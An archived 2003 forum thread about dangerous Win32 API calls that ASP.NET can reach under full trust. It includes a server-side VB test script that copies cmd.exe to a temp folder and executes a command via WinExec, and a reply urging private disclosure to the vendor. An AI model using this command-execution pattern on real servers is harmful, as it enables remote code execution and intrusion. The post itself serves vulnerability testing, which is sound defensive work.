Asp.Net.Vulnerability: Win32 API calls (potential security problems)

Discussion in 'ASP .Net Security' started by Dinis Cruz, Oct 16, 2003.

  1. Dinis Cruz

    Dinis Cruz Guest

    Asp.Net.Vulnerability: Win32 API calls (potential security problems)

    Since win32 calls are supported in Asp.Net and cannot be disabled when
    the website is running with 'Full trust', it is imperative to identify
    all potentially dangerous Win32 DLLs. Here is a short list of the ones
    we have identified whose risk needs to validated and (if required)
    write test scripts for:

    - New: CopyMemory, GetCurrentProcess, GetCurrentThread,
    GetTokenInformation, GetWindowsInformation, isNTAdmin,
    OpenProcessToken, OpenTheadToken, SendMessage
    - Compress: CopyLZFile, LZCopy
    - Crypto: CryptGetUserKey, CryptDestroyKey
    - Drives: GetLogicalDrives, GetVolumeInformation
    - EnvironmentVariables: GetEnvironmentString, GetEnvironmentVariable
    - Error: RaiseExeption, ReportFault, SetLastError
    - EventLog: OpenEventLog, ClearEventLog, ReportEvent
    - Exit: ExitWindowsEx, FatalAppExit, InitiateSystemShutdown,
    LockWorkstation
    - Files: CopyFile, CreateFile, GetFileAttributes, MoveFile, OpenFile,
    ReadFile, SetFileAttributes, SetFilePointer, SHGetFileInfo,
    TouchFileTimes, Writefile, FindFile: FindClose, FindFirstFile,
    FindNextFile
    - Heap: GetProcessHeap, HeapAlloc, HeapFree
    - Hook: CallNextHookEx, SetWindowsHookEx
    - ICMP: IcmpCreateFile, IcmpSendEcho
    - INI-Files: GetPrivateProfileSection , GetPrivateProfileString
    - Internet: FtpGetFile, InternetAttemptConnect, InternetConnect,
    InternetOpen, InternetOpenURL, InternetaReadFile,
    IsDestinationReachable, IsNetworkAlive, IsValidURL, URLdownloadtoFile
    - {List Not completed}

    Since we are not Win32 API experts (although we did manage to write a
    test script for the Kernel32 'WinExec' - see bellow) we would like ask
    for help to the more serious win32 developers which will be able to
    provide us with much more detailed and accurate information regarding
    the 'security risk' posed by each API call.

    The following is the code that we use in ANSA to test if a server is
    vulnerable.

    '****************************************************************
    ' ANSA:W32_execute_cmd - This test checks if it is possible to execute
    ' commands on the server using a direct Win32 API call to the
    ' kernel32 'winExec'function . For this test to work a copy of
    'cmd.exe' must
    ' be copied to the same directory containing this script
    '****************************************************************

    <script runat=server>

    Declare Function WinExec Lib "kernel32" Alias "WinExec" (ByVal
    lpCmdLine As String, ByVal nCmdShow As Long) As Long
    Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal
    lpExistingFileName As String, ByVal lpNewFileName As String, ByVal
    bFailIfExists As Long) As Long

    public Function Run_test(mode)

    try
    Dim winObj, objProcessInfo, item, local_dir, local_copy_of_cmd,
    Target_copy_of_cmd
    Dim objStartup, objConfig, objProcess, errReturn, intProcessID,
    temp_name
    Dim FailIfExists

    Dim Cmd_to_execute = "dir"

    local_dir = left(request.servervariables("PATH_TRANSLATED"), _

    inStrRev(request.servervariables("PATH_TRANSLATED"),"\"))
    local_copy_of_cmd = Local_dir+"cmd.exe"
    Target_copy_of_cmd =
    Environment.GetEnvironmentVariable("Temp")+"\_test.exe"

    ' Copy CMD.EXE to temp directory
    CopyFile(local_copy_of_cmd, Target_copy_of_cmd,FailIfExists)

    ' Execute Command and save results in temp file
    errReturn = WinExec(Target_copy_of_cmd + " /c " +
    cmd_to_execute, 10)


    Run_test = OK + Critical +" The server allows the remote
    execution of commands using a direct call to WinExec API!"
    catch
    Run_test = OK + low + "It was not possible to execute commands
    using cmd.exe"
    end try

    end function

    </script>

    '****************************************************************

    Thanks for the help

    Best regards
     
    Dinis Cruz, Oct 16, 2003
    #1
    1. Advertising

  2. Dinis ..why not forward this as it should be to

    The Microsoft Security Response Center (MSRC) draws on the hundreds of
    security professionals at Microsoft to form virtual teams that respond
    to reports of security issues with Microsoft products or technologies.
    To report a suspected vulnerability, please send e-mail to
    .

    Posting a potential vulnerablity to a public newsgroup is not showing
    good judgement for dislosure of vulnerabilities assuming these are valid.

    Report responsbility for all of our benefit on the Internet.

    Susan

    Dinis Cruz wrote:

    > Asp.Net.Vulnerability: Win32 API calls (potential security problems)
    >
    > Since win32 calls are supported in Asp.Net and cannot be disabled when
    > the website is running with 'Full trust', it is imperative to identify
    > all potentially dangerous Win32 DLLs. Here is a short list of the ones
    > we have identified whose risk needs to validated and (if required)
    > write test scripts for:
    >
    > - New: CopyMemory, GetCurrentProcess, GetCurrentThread,
    > GetTokenInformation, GetWindowsInformation, isNTAdmin,
    > OpenProcessToken, OpenTheadToken, SendMessage
    > - Compress: CopyLZFile, LZCopy
    > - Crypto: CryptGetUserKey, CryptDestroyKey
    > - Drives: GetLogicalDrives, GetVolumeInformation
    > - EnvironmentVariables: GetEnvironmentString, GetEnvironmentVariable
    > - Error: RaiseExeption, ReportFault, SetLastError
    > - EventLog: OpenEventLog, ClearEventLog, ReportEvent
    > - Exit: ExitWindowsEx, FatalAppExit, InitiateSystemShutdown,
    > LockWorkstation
    > - Files: CopyFile, CreateFile, GetFileAttributes, MoveFile, OpenFile,
    > ReadFile, SetFileAttributes, SetFilePointer, SHGetFileInfo,
    > TouchFileTimes, Writefile, FindFile: FindClose, FindFirstFile,
    > FindNextFile
    > - Heap: GetProcessHeap, HeapAlloc, HeapFree
    > - Hook: CallNextHookEx, SetWindowsHookEx
    > - ICMP: IcmpCreateFile, IcmpSendEcho
    > - INI-Files: GetPrivateProfileSection , GetPrivateProfileString
    > - Internet: FtpGetFile, InternetAttemptConnect, InternetConnect,
    > InternetOpen, InternetOpenURL, InternetaReadFile,
    > IsDestinationReachable, IsNetworkAlive, IsValidURL, URLdownloadtoFile
    > - {List Not completed}
    >
    > Since we are not Win32 API experts (although we did manage to write a
    > test script for the Kernel32 'WinExec' - see bellow) we would like ask
    > for help to the more serious win32 developers which will be able to
    > provide us with much more detailed and accurate information regarding
    > the 'security risk' posed by each API call.
    >
    > The following is the code that we use in ANSA to test if a server is
    > vulnerable.
    >
    > '****************************************************************
    > ' ANSA:W32_execute_cmd - This test checks if it is possible to execute
    > ' commands on the server using a direct Win32 API call to the
    > ' kernel32 'winExec'function . For this test to work a copy of
    > 'cmd.exe' must
    > ' be copied to the same directory containing this script
    > '****************************************************************
    >
    > <script runat=server>
    >
    > Declare Function WinExec Lib "kernel32" Alias "WinExec" (ByVal
    > lpCmdLine As String, ByVal nCmdShow As Long) As Long
    > Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal
    > lpExistingFileName As String, ByVal lpNewFileName As String, ByVal
    > bFailIfExists As Long) As Long
    >
    > public Function Run_test(mode)
    >
    > try
    > Dim winObj, objProcessInfo, item, local_dir, local_copy_of_cmd,
    > Target_copy_of_cmd
    > Dim objStartup, objConfig, objProcess, errReturn, intProcessID,
    > temp_name
    > Dim FailIfExists
    >
    > Dim Cmd_to_execute = "dir"
    >
    > local_dir = left(request.servervariables("PATH_TRANSLATED"), _
    >
    > inStrRev(request.servervariables("PATH_TRANSLATED"),"\"))
    > local_copy_of_cmd = Local_dir+"cmd.exe"
    > Target_copy_of_cmd =
    > Environment.GetEnvironmentVariable("Temp")+"\_test.exe"
    >
    > ' Copy CMD.EXE to temp directory
    > CopyFile(local_copy_of_cmd, Target_copy_of_cmd,FailIfExists)
    >
    > ' Execute Command and save results in temp file
    > errReturn = WinExec(Target_copy_of_cmd + " /c " +
    > cmd_to_execute, 10)
    >
    >
    > Run_test = OK + Critical +" The server allows the remote
    > execution of commands using a direct call to WinExec API!"
    > catch
    > Run_test = OK + low + "It was not possible to execute commands
    > using cmd.exe"
    > end try
    >
    > end function
    >
    > </script>
    >
    > '****************************************************************
    >
    > Thanks for the help
    >
    > Best regards


    --
    "Don't lose sight of security. Security is a state of being,
    not a state of budget. He with the most firewalls still does
    not win. Put down that honeypot and keep up to date on your patches.
    Demand better security from vendors and hold them responsible.
    Use what you have, and make sure you know how to use it properly
    and effectively."
    ~Rain Forest Puppy
    http://www.wiretrip.net/rfp/txt/evolution.txt
     
    Susan Bradley, CPA aka Ebitz - SBS Rocks [MVP], Oct 17, 2003
    #2
    1. Advertising

Want to reply to this thread or ask your own question?

It takes just 2 minutes to sign up (and it's free!). Just click the sign up button to choose a username and then you can ask your own questions on the forum.
Similar Threads
  1. Steve C. Orr [MVP, MCSD]

    ASP.NET Security Vulnerability Discovered. Install the patch!

    Steve C. Orr [MVP, MCSD], Oct 8, 2004, in forum: ASP .Net
    Replies:
    1
    Views:
    346
    =?Utf-8?B?U3RldmVS?=
    Nov 11, 2004
  2. Ken Cox [Microsoft MVP]

    ASP.NET Security Vulnerability Update

    Ken Cox [Microsoft MVP], Oct 8, 2004, in forum: ASP .Net
    Replies:
    0
    Views:
    331
    Ken Cox [Microsoft MVP]
    Oct 8, 2004
  3. Ken Cox [Microsoft MVP]

    ASP.NET Security Vulnerability Update

    Ken Cox [Microsoft MVP], Oct 8, 2004, in forum: ASP .Net Datagrid Control
    Replies:
    0
    Views:
    134
    Ken Cox [Microsoft MVP]
    Oct 8, 2004
  4. Dinis Cruz
    Replies:
    2
    Views:
    340
    Dinis Cruz
    Oct 20, 2003
  5. Dinis Cruz
    Replies:
    1
    Views:
    132
    Susan Bradley, CPA aka Ebitz - SBS Rocks [MVP]
    Oct 17, 2003
Loading...

Share This Page